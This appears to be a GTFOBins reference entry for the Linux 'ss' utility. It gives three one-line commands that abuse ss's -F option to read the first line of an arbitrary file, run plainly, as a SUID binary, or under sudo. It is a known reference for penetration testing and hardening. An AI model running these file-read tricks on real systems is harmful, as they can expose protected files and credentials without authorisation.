GTFOBins.github.io/_gtfobins/ss.md
2020-11-12 14:21:00 +01:00

359 B

description functions
The read file content is limited to the first line and corrupted by an error message.
file-read suid sudo
code
LFILE=file_to_read ss -a -F "$LFILE"
code
LFILE=file_to_read ./ss -a -F "$LFILE"
code
LFILE=file_to_read sudo ss -a -F "$LFILE"